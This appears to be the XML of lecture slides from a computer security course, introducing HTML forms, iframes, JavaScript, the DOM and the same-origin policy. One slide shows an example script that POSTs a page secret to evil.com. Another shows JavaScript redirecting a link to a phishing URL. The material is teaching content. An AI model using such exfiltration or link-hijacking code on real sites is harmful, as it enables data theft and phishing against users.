            <a:off x="601950" y="1215650"/>
            <a:ext cx="668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67" name="Google Shape;367;p51"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="598500" y="2530800"/>
            <a:ext cx="66894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Check out these comics!</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="368" name="Google Shape;368;p51"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="605400" y="2188825"/>
            <a:ext cx="668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369" name="Google Shape;369;p51"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="595050" y="3503975"/>
            <a:ext cx="3192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Clicking on this text will take you to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https://toon.cs161.org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Create a Form</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="375" name="Google Shape;375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76" name="Google Shape;376;p52"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="198500" y="1651500"/>
            <a:ext cx="4254300" cy="23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&lt;form action="</a:t>
            </a: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/feedback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" method="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&lt;label for="name"&gt;Name:&lt;/label&gt;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&lt;input type="text" id="name"&gt;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&lt;label for="bot"&gt;Favorite bot:&lt;/label&gt;&lt;br&gt;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&lt;input type="radio" id="evan"&gt;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&lt;label for="html"&gt;EvanBot&lt;/label&gt;&lt;br&gt;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&lt;input type="radio" id="coda"&gt;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&lt;label for="css"&gt;CodaBot&lt;/label&gt;&lt;br&gt;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&lt;input type="submit" value="Submit"&gt;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52"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="203850" y="1309525"/>
            <a:ext cx="425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78" name="Google Shape;378;p52"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4630375" y="1651500"/>
            <a:ext cx="2991000" cy="16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 bot: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EvanBot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CodaBot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2"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4635221" y="1309525"/>
            <a:ext cx="299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380" name="Google Shape;380;p52"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4739950" y="2881550"/>
            <a:ext cx="793500" cy="32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381" name="Google Shape;381;p52"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4778075" y="2395100"/>
            <a:ext cx="103500" cy="105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2"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4778075" y="2604975"/>
            <a:ext cx="103500" cy="105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2"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5670150" y="3025200"/>
            <a:ext cx="1545800" cy="752375"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path w="61832" h="30095" extrusionOk="0">
                <a:moveTo>
                  <a:pt x="61832" y="30095"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="6183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4" name="Google Shape;384;p52"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4609350" y="3450925"/>
            <a:ext cx="43278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Clicking on the submit button will make a </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en">
                <a:solidFill>
                  <a:srgbClr val="0000FF"/>
                </a:solidFill>
              </a:rPr>
              <a:t>POST</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en"/>
              <a:t> request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http://toon.cs161.org/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feedback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with the contents of the form</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="385" name="Google Shape;385;p52"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5316425" y="1782275"/>
            <a:ext cx="1290900" cy="2286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2"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="198500" y="4047625"/>
            <a:ext cx="37446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HTML inside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r>
              <a:rPr lang="en"/>
              <a:t> tags creates the form fields for the user to fill in.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Embed an Image</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="392" name="Google Shape;39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93" name="Google Shape;393;p53"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="579500" y="1575300"/>
            <a:ext cx="5293500" cy="6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&lt;p&gt;Look at my new desktop background!&lt;/p&gt;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&lt;img src="https://toon.cs161.org/assets/desktop.png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53"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="584850" y="12333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95" name="Google Shape;395;p53"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="689850" y="2581700"/>
            <a:ext cx="3488400" cy="245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my new desktop background!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3"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="689850" y="2239725"/>
            <a:ext cx="3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397" name="Google Shape;397;p53"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4853800" y="2498650"/>
            <a:ext cx="41673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will make a GET request to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https://toon.cs161.org/assets/desktop.png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display the returned image on the page.</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="398" name="Google Shape;398;p53"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5633650" y="2028125"/>
            <a:ext cx="1552602" cy="470535"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path w="61832" h="30095" extrusionOk="0">
                <a:moveTo>
                  <a:pt x="61832" y="30095"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="6183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99" name="Google Shape;3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49" y="2986575"/>
            <a:ext cx="3190502" cy="199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/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="584850" y="2657900"/>
            <a:ext cx="3769500" cy="223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toon website above.</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="405" name="Google Shape;405;p54"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill rotWithShape="1">
          <a:blip r:embed="rId3">
            <a:alphaModFix/>
          </a:blip>
          <a:srcRect b="21141"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="713275" y="2767950"/>
            <a:ext cx="3557202" cy="16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Embed Another Webpage</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="407" name="Google Shape;407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08" name="Google Shape;408;p54"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5189325" y="1855725"/>
            <a:ext cx="35007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outer frame embeds the inner frame (sometimes called an </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" b="1"/>
              <a:t>iframe</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en"/>
              <a:t> or </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" b="1"/>
              <a:t>frame</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>).</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="409" name="Google Shape;409;p54"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="579500" y="1575300"/>
            <a:ext cx="3775500" cy="6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&lt;iframe src="https://toon.cs161.org" height="200" width="300"&gt;&lt;/iframe&gt;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&lt;p&gt;CS 161 toon website above.&lt;/p&gt;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54"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="584850" y="12333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411" name="Google Shape;411;p54"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="590957" y="2315925"/>
            <a:ext cx="37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cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="412" name="Google Shape;412;p54"/>
          <p:cNvCxnSpPr/>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm rot="10800000">
            <a:off x="3926100" y="3495275"/>
            <a:ext cx="1803600" cy="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p54"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5189325" y="2995825"/>
            <a:ext cx="3383100" cy="10467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will make a GET request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https://toon.cs161.org/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
              </a:rPr>
              <a:t> and display the returned webpage in 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200 pixel × 300 pixel box.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419" name="Google Shape;419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CSS (Cascading Style Sheets)</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>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need to know the specifics of CSS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powerful: If used maliciously, it can often be as powerful as JavaScript!</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="420" name="Google Shape;42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JavaScript</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>: A programming language for running code in the web browser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</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" b="1"/>
              <a:t>client-side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sent by the server as part of the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in the browser, not the web server!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manipulate web pages (HTML and CSS)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modern websites interactive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can be directly embedded in HTML with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"/>
              <a:t> tags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modern webpages involve JavaScript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supported by all modern web browsers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don’t need to know JavaScript syntax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knowing common attack functions helps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Fact Sheet</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="433" name="Google Shape;433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High-level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Dynamically-typed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used in almost every web application, so a lot of work goes into making it execute quickly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Just-in-time compiling (compile code at runtime immediately before executing it) helps speed up execution</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="434" name="Google Shape;43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the Web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Vulnerabilities in the JavaScript interpreter/compiler</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="440" name="Google Shape;440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41" name="Google Shape;441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7891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browser runs JavaScript from external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Malicious websites can send JavaScript to the browser!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Browsers are sandboxed to prevent any malicious code from doing too much damage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vulnerability in the browser’s JavaScript interpreter/compiler is very dangerous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Just-in-time compilers need memory that’s both writable and executable (write the machine code and then execute it)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interpreter is vulnerable, an attacker can exploit memory safety bugs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“Use-after-free” on a JavaScript object results in an arbitrary read/write primitive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 now force the JavaScript program to inspect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Breaks ASLR: Examine memory to leak memory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Breaks non-executable pages: Use memory that’s both writable and executable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JavaScript is memory-safe and sandboxed, but a vulnerable interpreter/compiler can result in memory safety exploits!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JavaScript</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="447" name="Google Shape;447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any part of the webpage (e.g. HTML or CSS)</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="448" name="Google Shape;448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49" name="Google Shape;449;p59"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="335150" y="2062800"/>
            <a:ext cx="20976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Toon</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="450" name="Google Shape;450;p59"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="337314" y="1720825"/>
            <a:ext cx="20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451" name="Google Shape;451;p59"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2729075" y="2062800"/>
            <a:ext cx="58884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&lt;a id="link" href="https://toon.cs161.org"&gt;Toon&lt;/a&gt;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59"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2735149" y="1720825"/>
            <a:ext cx="58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(before JavaScript executes)</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="453" name="Google Shape;453;p59"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="335150" y="3572450"/>
            <a:ext cx="20976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Toon</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="454" name="Google Shape;454;p59"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="337326" y="4034075"/>
            <a:ext cx="20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455" name="Google Shape;455;p59"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2732663" y="3572450"/>
            <a:ext cx="58884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&lt;a id="link" href="https://cs161.org/phishing"&gt;Toon&lt;/a&gt;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59"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2737649" y="4011150"/>
            <a:ext cx="58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(after JavaScript executes)</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="457" name="Google Shape;457;p59"/>
          <p:cNvCxnSpPr>
            <a:stCxn id="449" idx="2"/>
            <a:endCxn id="453" idx="0"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1383950" y="2582700"/>
            <a:ext cx="0" cy="9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59"/>
          <p:cNvCxnSpPr>
            <a:stCxn id="451" idx="2"/>
            <a:endCxn id="455" idx="0"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5673275" y="2582700"/>
            <a:ext cx="3600" cy="9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9" name="Google Shape;459;p59"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="315800" y="2857875"/>
            <a:ext cx="8286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link").setAttribute(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https://cs161.org/phishing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59"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="315800" y="4567750"/>
            <a:ext cx="72729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changed the link! Now clicking it opens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https://cs161.org/phishing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JavaScript</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="466" name="Google Shape;466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pop-up message</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="467" name="Google Shape;467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68" name="Google Shape;468;p60"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="579500" y="2108700"/>
            <a:ext cx="4137900" cy="6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&lt;script&gt;alert("Happy Birthday!")&lt;/script&gt;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60"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="584850" y="17667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(with embedded JavaScript)</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="470" name="Google Shape;470;p60"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="584850" y="3343700"/>
            <a:ext cx="4052700" cy="16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0"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="590957" y="3001725"/>
            <a:ext cx="37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472" name="Google Shape;472;p60"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1685650" y="3776000"/>
            <a:ext cx="1580100" cy="7455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Birthday!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60"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2201350" y="4104100"/>
            <a:ext cx="548700" cy="32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  <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="474" name="Google Shape;474;p60"/>
          <p:cNvCxnSpPr>
            <a:stCxn id="475" idx="1"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm rot="10800000">
            <a:off x="3310600" y="4105600"/>
            <a:ext cx="1968900" cy="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5" name="Google Shape;475;p60"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5279500" y="3689950"/>
            <a:ext cx="31347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browser loads this HTML, it will run the embedded JavaScript and cause a pop-up to appear.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JavaScript</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="481" name="Google Shape;481;p6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HTTP requests</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="482" name="Google Shape;48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483" name="Google Shape;483;p61"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="456375" y="2161500"/>
            <a:ext cx="7573500" cy="110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&lt;script&gt;int secret = 42;&lt;/script&gt;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&lt;script&gt;fetch('https://evil.com/receive',{method:'POST', body: secret})&lt;/script&gt;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61"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="461725" y="1819525"/>
            <a:ext cx="757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(with embedded JavaScript)</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="485" name="Google Shape;485;p61"/>
          <p:cNvCxnSpPr/>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm rot="10800000">
            <a:off x="5114125" y="3214600"/>
            <a:ext cx="0" cy="8910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6" name="Google Shape;486;p61"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3980750" y="3755025"/>
            <a:ext cx="38853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attacker somehow adds this JavaScript, the browser will send a POST request to the attacker’s server with the secret.</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="487" name="Google Shape;487;p61"/>
          <p:cNvCxnSpPr/>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm rot="10800000">
            <a:off x="1764575" y="2523800"/>
            <a:ext cx="0" cy="16863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" name="Google Shape;488;p61"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="701125" y="3755025"/>
            <a:ext cx="23973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the server returns some HTML with a secret JavaScript variable.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a Webpage</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="494" name="Google Shape;494;p6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of displaying (rendering) a webpage in a web browser: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browser receives HTML, CSS, and JavaScript from the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and CSS are parsed into a </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" b="1"/>
              <a:t>DOM (Document Object Model)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interpreted and executed, possibly modifying the DOM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painter uses the DOM to draw the webpage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DOM (Document Object Model)</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>: Cross-platform model for representing and interacting with objects in HTML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tree of nodes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node has a tag, attributes, and child nodes</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="495" name="Google Shape;495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on the Web</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="501" name="Google Shape;50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on the Web</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="507" name="Google Shape;507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#2: A malicious website should not be able to damage our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Visiting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 should not infect our computer with malware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we visit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, the attacker who owns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 should not be able to read/write files on our computer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Protection: Sandboxing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not allowed to access files on our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Privilege separation, least privilege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Browsers are carefully written to avoid exploiting the browser's code (e.g. write the browser in a memory-safe language)</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="508" name="Google Shape;508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on the Web</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="514" name="Google Shape;514;p6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#1: Web servers should be protected from unauthorized access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An attacker should not be able to hack into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r>
              <a:rPr lang="en"/>
              <a:t> and provide malicious search results to users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Protection: Server-side security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Protect the server computer from buffer overflow attacks</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="515" name="Google Shape;515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on the Web</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="521" name="Google Shape;521;p6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#3: A malicious website should not be able to tamper with our information or interactions on other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we visit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, the attacker who owns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 should not be able to read our emails or buy things with our Amazon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Protection: Same-origin policy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browser prevents a website from accessing other </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" i="1"/>
              <a:t>unrelated</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en"/>
              <a:t> websites</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="522" name="Google Shape;52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28" name="Google Shape;528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the Web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was not designed with security from the start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 design decisions can help us understand where modern security vulnerabilities originated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Policy: Definition</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="534" name="Google Shape;534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535" name="Google Shape;535;p6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Same-origin policy</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>: A rule that prevents one website from tampering with other </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" i="1"/>
              <a:t>unrelated</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>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Enforced by the web browser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Prevents a malicious website from tampering with behavior on other websites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7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webpage has an </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" b="1"/>
              <a:t>origin</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en"/>
              <a:t> defined by its URL with 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Protocol</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>: The protocol in the URL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0000FF"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Domain</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>: The domain in the URL’s location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6AA84F"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Port</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>: The port in the URL’s location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no port is specified, the default is 80 for HTTP and 443 for HTTPS</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="541" name="Google Shape;541;p6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42" name="Google Shape;542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543" name="Google Shape;543;p69"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="601100" y="2961625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toon.cs161.org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443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/assets/lock.PNG</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="544" name="Google Shape;544;p69"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="850750" y="3715925"/>
            <a:ext cx="702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/assets/images/404.png</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="545" name="Google Shape;545;p69"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4053675" y="4068225"/>
            <a:ext cx="211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800">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
              </a:rPr>
              <a:t> (default port)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51" name="Google Shape;551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webpages have the same origin </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" i="1"/>
              <a:t>if and only if</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en"/>
              <a:t> the protocol, domain, and port of the URL all match exactly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string matching: The protocol, domain, and port strings must be equal</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="552" name="Google Shape;552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graphicFrame>
        <p:nvGraphicFramePr>
          <p:cNvPr id="553" name="Google Shape;553;p70"/>
          <p:cNvGraphicFramePr/>
          <p:nvPr/>
        </p:nvGraphicFramePr>
        <p:xfrm>
          <a:off x="369450" y="2433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{B0F23E48-BBB6-4CF5-8DF9-8C28CEC27F89}</a:tableStyleId>
              </a:tblPr>
              <a:tblGrid>
                <a:gridCol w="311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First domain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Second domain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origin?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4" name="Google Shape;554;p70"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="369450" y="2982525"/>
            <a:ext cx="31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endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="555" name="Google Shape;555;p70"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3488250" y="2982525"/>
            <a:ext cx="291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endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="556" name="Google Shape;556;p70"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6564750" y="2874825"/>
            <a:ext cx="240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Protocol mismatch</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
              </a:rPr>
            </a:b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>
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
              </a:rPr>
              <a:t> ≠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endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="557" name="Google Shape;557;p70"/>
          <p:cNvSpPr txBox="1"/>
